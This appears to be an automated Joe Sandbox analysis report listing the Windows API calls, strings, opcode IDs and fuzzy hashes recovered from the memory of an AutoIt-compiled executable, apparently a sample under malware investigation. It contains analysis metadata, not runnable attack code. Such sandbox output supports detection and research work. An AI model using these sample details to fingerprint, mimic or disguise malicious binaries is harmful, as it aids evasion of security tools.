                                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                                        • Opcode ID: 83d0bce959b846ae3126772df5c3a95f9607577b2eedefbd48ec77a3d0405f15
                                                                                                                                                        • Instruction ID: c45d20553ffa5dd7295dc585fc55a3330c68d607444a5b64c63338bce8437c3f
                                                                                                                                                        • Opcode Fuzzy Hash: 83d0bce959b846ae3126772df5c3a95f9607577b2eedefbd48ec77a3d0405f15
                                                                                                                                                        • Instruction Fuzzy Hash: BA315A31A44209A6DE25EB60DE93FEE73E89F10714FA00469F541710E7FFA1AF04A661
                                                                                                                                                        APIs
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00ACF8AB
                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ACF8BD
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00ACF8D4
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00ACF8E9
                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00ACF8EF
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00ACF8FF
                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00ACF905
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ACF926
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ACF940
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00ACF949
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00ACF9B4
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00ACF9BA
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00ACF9C1
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ACFA0D
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00ACFA1A
                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ACFA3F
                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ACFA6A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                                        • Opcode ID: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                                                                                                                                                        • Instruction ID: 82aa27193ca3c00b9cd75bb4ef3a3c53ae4367e95e95ba6334807de2374af954
                                                                                                                                                        • Opcode Fuzzy Hash: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                                                                                                                                                        • Instruction Fuzzy Hash: 4F513B71900709AFDB209FA8CD89FAEBBF6FF04705F11492DE596A35A0CB74A944CB50
                                                                                                                                                        APIs
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE026A
                                                                                                                                                        • _wcschr.LIBCMT ref: 00AE0278
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE028F
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE029E
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE02BC
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE02DD
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AE03BA
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE03DF
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE03F1
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE0406
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE041B
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE042D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0442
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscmp.LIBCMT ref: 00ADC92A
                                                                                                                                                          • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC96F
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscpy.LIBCMT ref: 00ADC982
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC995
                                                                                                                                                          • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC9BA
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9D0
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9E3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                                                        • Opcode ID: 828373cb6f7e89d107a030dbe9b8ceb96794e3db25c49d5ec40cdcca7d3c5256
                                                                                                                                                        • Instruction ID: b251fcbd2f682ec6fc6c3248634712cb1102f05158f4640a72d0b74bed4e6eee
                                                                                                                                                        • Opcode Fuzzy Hash: 828373cb6f7e89d107a030dbe9b8ceb96794e3db25c49d5ec40cdcca7d3c5256
                                                                                                                                                        • Instruction Fuzzy Hash: 4491B671604741AFCB24EB64CA55F9FB3E8AF84310F04485DF5499B292EB74EA84CB92
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AFCD0B
                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00AFCD83
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AFCE04
                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AFCE26
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCE35
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00AFCE52
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A90000,00000000), ref: 00AFCE85
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCEA4
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00AFCEB9
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00AFCEC0
                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AFCED2
                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AFCEEA
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                                                        • Opcode ID: c5324591b102448a1459d1f625c7cef554a5671acc528bad4f066ad9875c0131
                                                                                                                                                        • Instruction ID: 71eefcb40c353b8467b77c2edbab66c1f60b8591fc3ccdeb49b4d7f875d1f46a
                                                                                                                                                        • Opcode Fuzzy Hash: c5324591b102448a1459d1f625c7cef554a5671acc528bad4f066ad9875c0131
                                                                                                                                                        • Instruction Fuzzy Hash: 6F719A71240309AFEB25CF68CD45FBA3BE5EB89714F440918FA85972A1DB70E801CB21
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00ADB46D
                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00ADB476
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ADB482
                                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ADB561
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADB591
                                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00ADB5BD
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00ADB63F
                                                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00ADB6D1
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ADB727
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ADB736
                                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00ADB772
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                                                        • Opcode ID: 5d3b28069732b8fdb052c6745c9a91b0039f752fb4134a28b99ad9306ad0c5ad
                                                                                                                                                        • Instruction ID: e3fc15980148d596eaab990273f726f4943547c635639ccd21e9bb2e87272741
                                                                                                                                                        • Opcode Fuzzy Hash: 5d3b28069732b8fdb052c6745c9a91b0039f752fb4134a28b99ad9306ad0c5ad
                                                                                                                                                        • Instruction Fuzzy Hash: 73C1ECB1A10615EBCF10DF65D894BAAB7B4FF05300F26846AE4069B792DB34ED40DBB1
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00AF6FF9
                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF7044
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                                                        • Opcode ID: 71e2a67f91ba441f7bf613d01f308192e3170b12ea6ff5a0ba055de6d23a7ac1
                                                                                                                                                        • Instruction ID: a67f422f4de09796f848a48bc58fd91d0ad589512849d7b52b8b312a8f390efd
                                                                                                                                                        • Opcode Fuzzy Hash: 71e2a67f91ba441f7bf613d01f308192e3170b12ea6ff5a0ba055de6d23a7ac1
                                                                                                                                                        • Instruction Fuzzy Hash: F79191342046018FCB14EF54CA51B7EB7E1AF89350F04886DF9965B3A2CB35ED4ACB81
                                                                                                                                                        APIs
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AFE3BB
                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AFBCBF), ref: 00AFE417
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE457
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE49C
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE4D3
                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00AFBCBF), ref: 00AFE4DF
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AFE4EF
                                                                                                                                                        • DestroyCursor.USER32(?), ref: 00AFE4FE
                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AFE51B
                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AFE527
                                                                                                                                                          • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                        • API String ID: 3907162815-1154884017
                                                                                                                                                        • Opcode ID: 7a03e83e1e69f70d388581e820a0829982c9f950c0a115946ccef7c22e5870d5
                                                                                                                                                        • Instruction ID: 67526bd13c645ae9e7bffd757e9dff0c7ace6b74c58318e53f89f44a8ecfa6d1
                                                                                                                                                        • Opcode Fuzzy Hash: 7a03e83e1e69f70d388581e820a0829982c9f950c0a115946ccef7c22e5870d5
                                                                                                                                                        • Instruction Fuzzy Hash: 9C61CF71600219BEEB14DFA4CD46FFA7BACBB08711F108209FA11EB0E1DB759990D7A0
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00AE0EFF
                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AE0F0F
                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AE0F1B
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AE0F79
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0F91
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0FA3
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0FB8
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FCC
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FFE
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE101F
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE102B
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AE106A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                                        • Opcode ID: 4ace16f4bd435f635362baca3b4fd85210a39be80630e54e969a0a9e50c8f2ab
                                                                                                                                                        • Instruction ID: acf1b8b9f7d6aeec39ca60ca762daa4e1889a29ab4610caebdc88708c598a447
                                                                                                                                                        • Opcode Fuzzy Hash: 4ace16f4bd435f635362baca3b4fd85210a39be80630e54e969a0a9e50c8f2ab
                                                                                                                                                        • Instruction Fuzzy Hash: F8618F725043459FCB10EF64C944E9EB3E8FF89310F04892EF99987251EB35EA45CB92
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00ADDB26
                                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 00ADDB73
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBBB
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBF2
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDC20
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                                                        • Opcode ID: 4c7c029e7e6c615264ee30677ab955c01fff8ebac2df6e0533c7be3411642498
                                                                                                                                                        • Instruction ID: c210a0adeb4967e5beab56bcb185184c80f0c8c08ffd679067fde08ff64a9d3e
                                                                                                                                                        • Opcode Fuzzy Hash: 4c7c029e7e6c615264ee30677ab955c01fff8ebac2df6e0533c7be3411642498
                                                                                                                                                        • Instruction Fuzzy Hash: 7D518D716043059FCB00EF24CA9196AB7F5FF88758F04886DF896972A1DB31EE05CB92
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00AD3145
                                                                                                                                                        • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD314E
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00AD3170
                                                                                                                                                        • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD3173
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD31B3
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD31C5
                                                                                                                                                        • _wprintf.LIBCMT ref: 00AD326C
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD3283
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                                                        • Opcode ID: 2caf932458259c32409883c1e96618fc6ae929953422d56e7d60d6b17a8cc78b
                                                                                                                                                        • Instruction ID: 95922045410f1b27c8331793e2273264d7ad9a209b1087b49ad949333ef060e1
                                                                                                                                                        • Opcode Fuzzy Hash: 2caf932458259c32409883c1e96618fc6ae929953422d56e7d60d6b17a8cc78b
                                                                                                                                                        • Instruction Fuzzy Hash: 7D412472A00219BACF15FBA0DE57EEEB7F9AF14741F500066F206B20A2DE655F04CB61
                                                                                                                                                        APIs
                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00ADD96C
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADD98E
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ADD9CB
                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ADD9F0
                                                                                                                                                        • _memset.LIBCMT ref: 00ADDA0F
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00ADDA4B
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00ADDA80
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ADDA8B
                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00ADDA94
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ADDA9E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                                                        • Opcode ID: b56ade2b732d41a3df3b207ceecffe92fdcdb257f75f305e0602413f769de915
                                                                                                                                                        • Instruction ID: af9259100fc36a6068257811f50b401f3abee1ab8e1ec01d572d739fb5b06f9a
                                                                                                                                                        • Opcode Fuzzy Hash: b56ade2b732d41a3df3b207ceecffe92fdcdb257f75f305e0602413f769de915
                                                                                                                                                        • Instruction Fuzzy Hash: 0F31A472600208AADB20DFA4DC49FDA77FCBF88700F50C1A6F519D6161EB709B458BA1
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AFBD04,?,?), ref: 00AFE564
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE57B
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE586
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE593
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AFE59C
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5AB
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AFE5B4
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5BB
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AFE5CC
                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B1D9BC,?), ref: 00AFE5E5
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00AFE5F5
                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00AFE619
                                                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00AFE644
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AFE66C
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AFE682
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                        • Opcode ID: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                                                                                                                                                        • Instruction ID: 8800c8267b0e7864ed6f56776fb721723212e5f4b4d4ecfd74be3e2562613d74
                                                                                                                                                        • Opcode Fuzzy Hash: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                                                                                                                                                        • Instruction Fuzzy Hash: 77413A75600208BFDB11DFA5DC88EAEBBB9EF89715F508058FA06E7260DB319D41DB60
                                                                                                                                                        APIs
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AE0C93
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0CAB
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0CBD
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0CD2
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0CE6
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00AE0CFE
                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AE0D18
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0D2A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                                                        • Opcode ID: 61429ad106a6f1000c0e022706bdd5a04dcae90515e700d7c75c0ffc686755d5
                                                                                                                                                        • Instruction ID: 38d6fe7f6ab3179d245c23a61f6a4eaf0c849b165e08ca1b862660ffd36bfb2b
                                                                                                                                                        • Opcode Fuzzy Hash: 61429ad106a6f1000c0e022706bdd5a04dcae90515e700d7c75c0ffc686755d5
                                                                                                                                                        • Instruction Fuzzy Hash: 858193715043859FC764DF65C984EAAB7E8BB88310F24892AF885C7251EB74DDC4CB92
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                                                                                                                                                          • Part of subcall function 00ACB8E7: RtlAllocateHeap.NTDLL(00000000,?,00ACB3CB), ref: 00ACB923
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                                                                                                                                                          • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                                                                                                                                                          • Part of subcall function 00ACB982: RtlAllocateHeap.NTDLL(00000000,?,00ACB3E1), ref: 00ACB995
                                                                                                                                                          • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB5F7
                                                                                                                                                        • _memset.LIBCMT ref: 00ACB60C
                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB62B
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB63C
                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB679
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB695
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB6B2
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB6C1
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ACB6C8
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB6E9
                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00ACB6F0
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB721
                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB747
                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB75B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
